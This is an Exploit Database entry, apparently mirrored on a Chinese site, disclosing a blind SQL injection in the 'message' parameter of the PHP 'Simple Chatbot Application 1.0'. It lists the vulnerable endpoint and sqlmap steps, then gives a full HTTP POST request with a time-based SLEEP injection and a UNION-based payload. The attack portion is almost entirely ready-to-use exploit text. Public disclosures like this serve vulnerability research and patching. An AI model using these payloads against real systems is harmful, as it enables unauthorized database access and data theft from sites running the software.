Simple Chatbot Application 1.0 – ‘message’ Blind SQLi

• Exploit Database
• 22 阅读

• 作者： Saud Alenazi
  日期： 2022-01-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50673/

• # Exploit Title: Simple Chatbot Application 1.0 - 'message' Blind SQLi
  # Date: 18/01/2022
  # Exploit Author: Saud Alenazi
  # Vendor Homepage: https://www.sourcecodester.com/
  # Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html
  # Version: 1.0
  # Tested on: XAMPP, Windows 10
  
  # Steps
  # Go to : http://127.0.0.1/classes/Master.php?f=get_response
  # Save request in BurpSuite
  # Run saved request with sqlmap -r sql.txt
  
  ======
  
  POST /classes/Master.php?f=get_response HTTP/1.1
  Host: 127.0.0.1
  Content-Type: application/x-www-form-urlencoded
  X-Requested-With: XMLHttpRequest
  Cookie: PHPSESSID=45l30lmah262k7mmg2u5tktbc2
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Encoding: gzip,deflate
  Content-Length: 73
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
  Connection: Keep-alive
  
  message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud
  
  ======
  
  #Payloads
  
  #Payload (UNION query)
  message=-8150' UNION ALL SELECT CONCAT(0x717a766b71,0x6d466451694363565172525259434d436c53677974774a424b635856784f4d5a41594e4e75424474,0x716a7a7171),NULL-- -
  
  #(AND/OR time-based blind)
  message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud